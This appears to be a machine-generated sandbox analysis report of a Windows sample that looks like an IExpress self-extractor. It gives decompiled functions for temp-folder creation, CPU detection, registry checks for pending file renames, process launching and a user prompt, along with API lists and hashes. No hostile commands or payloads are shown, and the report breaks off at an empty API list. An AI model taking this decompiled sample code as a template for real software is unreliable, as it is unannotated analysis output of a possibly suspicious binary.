Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2310010875
Opcode ID: 24a2dcc45f7fd2efc1198b6bc479a560e2c42e2da66aa21fce2e28f3b44b595f
Instruction ID: 41fa63fa4a19d62ece21a5c87962d8b8198a3c756efa9516651f078eff16c519
Opcode Fuzzy Hash: 24a2dcc45f7fd2efc1198b6bc479a560e2c42e2da66aa21fce2e28f3b44b595f
Instruction Fuzzy Hash: 83110171700214B7E730AB269C48FEF3AADEFD5721F004069F6C6E3190CE7A894287A0

Uniqueness

Uniqueness Score: -1.00%

Function 01065467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E01065467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x1068004; // 0x19e58fb5
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x10691e4;
					_t42 = 0x104;
					E01061680(0x10691e4, 0x104);
					L14:
					_t13 = E010658C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x1069124 = 0;
							_t14 = 1;
							L24:
							return E01066CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0106597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x1068a20; // 0x0
						if(_t61 != 0) {
							 *0x1068a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x1069124 = E01066285();
						goto L22;
					}
					 *0x1068a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E010653A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x10691e4;
				E01061781(0x10691e4, 0x104, __ecx,  &_v268);
				if(( *0x1069a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0106658A(_t48, 0x104, 0x1061140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0106658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x01065472
0x01065479
0x01065481
0x01065484
0x0106551c
0x01065521
0x01065528
0x0106552d
0x0106552f
0x01065539
0x0106554d
0x0106554d
0x01065552
0x01065585
0x01065585
0x0106558b
0x0106558d
0x0106559d
0x0106559d
0x01065557
0x0106555e
0x00000000
0x00000000
0x01065560
0x01065566
0x01065569
0x0106556f
0x0106556f
0x01065581
0x01065581
0x00000000
0x01065581
0x01065545
0x0106557c
0x00000000
0x0106557c
0x01065547
0x00000000
0x01065547
0x0106548a
0x01065490
0x01065497
0x00000000
0x00000000
0x0106549d
0x010654ab
0x010654b4
0x010654c0
0x0106550c
0x01065511
0x01065515
0x00000000
0x01065515
0x010654c9
0x010654d6
0x010654d8
0x010654fe
0x01065503
0x01065507
0x00000000
0x01065507
0x010654da
0x010654dd
0x010654f7
0x00000000
0x010654f7
0x010654df
0x010654e2
0x010654f0
0x00000000
0x010654f0
0x010654e7
0x00000000
0x00000000
0x010654e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010654C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106556F

Part of subcall function 010653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010653FB
Part of subcall function 010653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065402
Part of subcall function 010653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106541F
Part of subcall function 010653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106542B
Part of subcall function 010653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065434

Strings

ppc, xrefs: 010654E9
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 0106547D, 01065481, 010654AB, 0106551C, 0106553C, 01065568
i386, xrefs: 010654FE
mips, xrefs: 010654F7
alpha, xrefs: 010654F0

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-1000730752
Opcode ID: 0c566fbc18cefbc0a8d9f4e6882a2f548f52b81e3e2fb3df6c3be422d6211262
Instruction ID: 3b93d4e3a4bf948c24e877a7e95e3a30e2d582771a1cef813270adb2ac433c74
Opcode Fuzzy Hash: 0c566fbc18cefbc0a8d9f4e6882a2f548f52b81e3e2fb3df6c3be422d6211262
Instruction Fuzzy Hash: 20313B70B002259BDB60AF2D9C689BE77DFABD12C4B0441AEE9C2D7544DB76CF018790

Uniqueness

Uniqueness Score: -1.00%

Function 0106256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0106256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E010624E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x01062572
0x01062573
0x01062575
0x01062578
0x0106257d
0x01062627
0x01062583
0x01062586
0x01062589
0x010625eb
0x01062607
0x00000000
0x01062609
0x0106261a
0x00000000
0x0106261a
0x00000000
0x0106258b
0x0106258b
0x0106259e
0x010625b2
0x010625ba
0x010625cb
0x010625d1
0x010625d6
0x010625da
0x010625dd
0x010625dd
0x010625e3
0x010625e3
0x010625e3
0x0106258b
0x01062589
0x0106262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,01064096,01064096,?,01061ED3,00000001,00000000,?,?,01064137,?), ref: 010625B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,01064096,?,01061ED3,00000001,00000000,?,?,01064137,?,01064096), ref: 010625CB
RegCloseKey.KERNELBASE(?,?,01061ED3,00000001,00000000,?,?,01064137,?,01064096), ref: 010625DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,01064096,01064096,?,01061ED3,00000001,00000000,?,?,01064137,?), ref: 010625FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,01064096,00000000,00000000,00000000,00000000,?,01061ED3,00000001,00000000), ref: 0106261A

Strings

System\CurrentControlSet\Control\Session Manager, xrefs: 010625A8
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010625F5
PendingFileRenameOperations, xrefs: 010625C3

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: 3ccbba3c5a65ad8f30c23f6ba2239a262554f7b7d15b40120911fb4004212b87
Instruction ID: deb197b4572e57acda86905ad8b5709149436beb9f86c2f6d2a65283d1641a23
Opcode Fuzzy Hash: 3ccbba3c5a65ad8f30c23f6ba2239a262554f7b7d15b40120911fb4004212b87
Instruction Fuzzy Hash: 49113D35A42228FBAB309A969C09DFBBEBCEF056A1F104095F989A2010D6355B44D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01066A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E01067155();
				_push(0x58);
				_push(0x10672b8);
				E01067208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x10688b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x10688b0; // 0x2
						if(__eflags != 0) {
							 *0x10681e4 = _t58;
							goto L13;
						} else {
							 *0x10688b0 = _t58;
							_t37 = E01066C3F(0x10610b8, 0x10610c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L01066FF4();
						L13:
						_t68 =  *0x10688b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x10610b4);
							_push(0x10610ac);
							L01067202();
							 *0x10688b0 = 2;
						}
						if(_t53 == 0) {
							 *0x10688ac = 0;
						}
						_t71 =  *0x10688b4;
						if( *0x10688b4 != 0 && E01067060(_t71, 0x10688b4) != 0) {
							_t60 =  *0x10688b4; // 0x0
							 *0x106a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x76665b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E01062BFB(0x1060000, 0, _t59); // executed
							 *0x10681e0 = _t30;
							__eflags =  *0x10681f8;
							if( *0x10681f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x10681e4;
							if( *0x10681e4 == 0) {
								__imp___cexit();
								_t30 =  *0x10681e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0106724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

0x01066a60
0x01066a6a
0x01066a6c
0x01066a71
0x01066a78
0x01066a7f
0x01066a85
0x01066a8e
0x01066a91
0x01066a93
0x01066a9c
0x01066aa2
0x00000000
0x00000000
0x01066aa6
0x01066ab4
0x00000000
0x01066aa8
0x01066aaa
0x01066aab
0x01066aab
0x01066abf
0x01066abf
0x01066ac5
0x01066ad1
0x01066ad7
0x01066b05
0x00000000
0x01066ad9
0x01066ad9
0x01066ae9
0x01066af0
0x01066af2
0x00000000
0x01066af4
0x01066af4
0x01066afb
0x01066afb
0x01066af2
0x01066ac7
0x01066ac7
0x01066ac9
0x01066b0b
0x01066b0b
0x01066b11
0x01066b13
0x01066b18
0x01066b1d
0x01066b24
0x01066b24
0x01066b30
0x01066b39
0x01066b39
0x01066b3b
0x01066b42
0x01066b57
0x01066b5f
0x01066b65
0x01066b65
0x01066b67
0x01066b6c
0x01066b6e
0x01066b71
0x01066b74
0x01066b74
0x01066b79
0x00000000
0x00000000
0x01066b7d
0x01066b81
0x00000000
0x00000000
0x01066b83
0x01066b8c
0x01066b8d
0x01066b90
0x01066b90
0x01066b83
0x01066b81
0x01066b94
0x01066b98
0x01066ba2
0x01066b9a
0x01066b9a
0x01066b9a
0x01066ba3
0x01066bab
0x01066bb0
0x01066bb5
0x01066bbc
0x01066bbf
0x00000000
0x01066bbf
0x01066c1e
0x01066c25
0x01066c27
0x01066c2d
0x01066c2d
0x01066c32
0x00000000
0x01066bc5
0x01066bc5
0x01066bc8
0x01066bcc
0x01066bce
0x01066bce
0x01066bd1
0x01066bd3
0x01066bd3
0x01066bd6
0x01066bda
0x01066be1
0x01066be3
0x01066be5
0x01066be5
0x01066be6
0x01066be6
0x01066be9
0x01066bea
0x01066bea
0x01066b74
0x01066c39
0x01066c3e
0x01066c3e
0x01066abe
0x01066abe
0x00000000

APIs

Part of subcall function 01067155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01067182
Part of subcall function 01067155: GetCurrentProcessId.KERNEL32 ref: 01067191
Part of subcall function 01067155: GetCurrentThreadId.KERNEL32 ref: 0106719A
Part of subcall function 01067155: GetTickCount.KERNEL32 ref: 010671A3
Part of subcall function 01067155: QueryPerformanceCounter.KERNEL32(?), ref: 010671B8

GetStartupInfoW.KERNEL32(?,010672B8,00000058), ref: 01066A7F
Sleep.KERNEL32(000003E8), ref: 01066AB4
_amsg_exit.MSVCRT ref: 01066AC9
_initterm.MSVCRT ref: 01066B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 01066B49
exit.KERNELBASE ref: 01066BBF
_ismbblead.MSVCRT ref: 01066BDA

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: 177c16f59217cd33e1ee1bb9d1cb0a2e4eaa71ec13c870ffab8aeb33213cce81
Instruction ID: 5637309764d9197c7cece6129c81dfd4ed01299a941e65e4e843cc35efbf1c00
Opcode Fuzzy Hash: 177c16f59217cd33e1ee1bb9d1cb0a2e4eaa71ec13c870ffab8aeb33213cce81
Instruction Fuzzy Hash: 7B41E730A44326DFEB719B6DD9047AE7BECFB84720F14515AE9C1A7294CB7B48808B80

Uniqueness

Uniqueness Score: -1.00%

Function 010658C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E010658C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E01061680(_t20, _t36, _t33);
					E0106658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x1069124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x1069124 = E01066285();
					_t14 = 0;
				}
				return _t14;
			}

0x010658cd
0x010658d1
0x010658d3
0x010658d5
0x010658d8
0x010658d8
0x010658da
0x010658db
0x010658e1
0x010658ed
0x010658f1
0x0106591e
0x0106592c
0x01065943
0x0106594a
0x0106594d
0x01065953
0x01065959
0x00000000
0x0106595b
0x0106595c
0x01065963
0x0106596c
0x00000000
0x01065972
0x01065974
0x0106597a
0x0106597a
0x0106596c
0x010658f3
0x01065901
0x01065906
0x0106590b
0x01065910
0x01065910
0x01065918

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010658E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065943
LocalFree.KERNEL32(00000000,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106594D
CloseHandle.KERNEL32(00000000,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0106595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01065534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01065963

Strings

TMP4351$.TMP, xrefs: 01065923
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010658CD, 010658CF, 01065919, 01065962

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-1860564779
Opcode ID: 87e1ddeb5dc502afa59fc95db9022f86a6c1ce2ebfb9fcfbf9209f708ee4dc03
Instruction ID: c228e05cd931303c89104d3bc11926621bb237a8ab939e1f2f7990b0ece97516
Opcode Fuzzy Hash: 87e1ddeb5dc502afa59fc95db9022f86a6c1ce2ebfb9fcfbf9209f708ee4dc03
Instruction Fuzzy Hash: 04113871700221ABD7302E7D5C0CA9B7E9DDF862A0B100659F6C6E71C4CE769845C3B0

Uniqueness

Uniqueness Score: -1.00%

Function 01063FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E01063FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x1068004; // 0x19e58fb5
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E01066CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x1069124 = E01066285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E010644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x1068a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x1069a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x1069a2c = _t44;
						}
					}
				}
				E0106411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x1069a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01063fef
0x01063ffa
0x01064001
0x01064008
0x0106400a
0x0106400b
0x01064010
0x0106410a
0x0106411a
0x0106411a
0x0106401c
0x0106401d
0x0106401e
0x0106401f
0x01064033
0x0106403b
0x010640ca
0x010640e9
0x010640f8
0x01064101
0x01064106
0x01064106
0x01064108
0x01064108
0x00000000
0x01064108
0x01064049
0x0106405c
0x01064062
0x01064068
0x0106406e
0x01064070
0x01064077
0x0106407f
0x01064089
0x0106408b
0x0106408b
0x01064089
0x01064077
0x01064091
0x0106409c
0x010640a8
0x010640b8
0x00000000
0x010640c2
0x00000000
0x010640c2

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 01064033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 01064049
GetExitCodeProcess.KERNELBASE ref: 0106405C
CloseHandle.KERNEL32(?), ref: 0106409C
CloseHandle.KERNEL32(?), ref: 010640A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010640DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 010640E9

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: a121573a7f80e16aea712e0b3cc8d336b836e8bf9ef53cad23e9c8cbbb1a1c1b
Instruction ID: 7ced793cae422cd009109884f7157973f0f062fdd4dbe45f680afa01934c2a64
Opcode Fuzzy Hash: a121573a7f80e16aea712e0b3cc8d336b836e8bf9ef53cad23e9c8cbbb1a1c1b
Instruction Fuzzy Hash: 2631C231740218EBFB709B65DC48FAB7BBCEB94700F1001A9F585E6165CA364D81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010651E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010651E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0106468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0106468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E010644B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x1069124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x1069124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x1069124 = 0x80070714;
					goto L10;
				}
				E010644B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x1069124 = E01066285();
				goto L10;
			}

0x010651fb
0x01065207
0x0106520b
0x0106523c
0x01065268
0x01065270
0x0106528b
0x01065293
0x0106529c
0x010652a6
0x010652b0
0x00000000
0x010652b0
0x0106529e
0x01065279
0x00000000
0x0106527b
0x01065273
0x00000000
0x01065273
0x0106524a
0x01065250
0x01065256
0x00000000
0x01065256
0x01065219
0x01065223
0x00000000

APIs

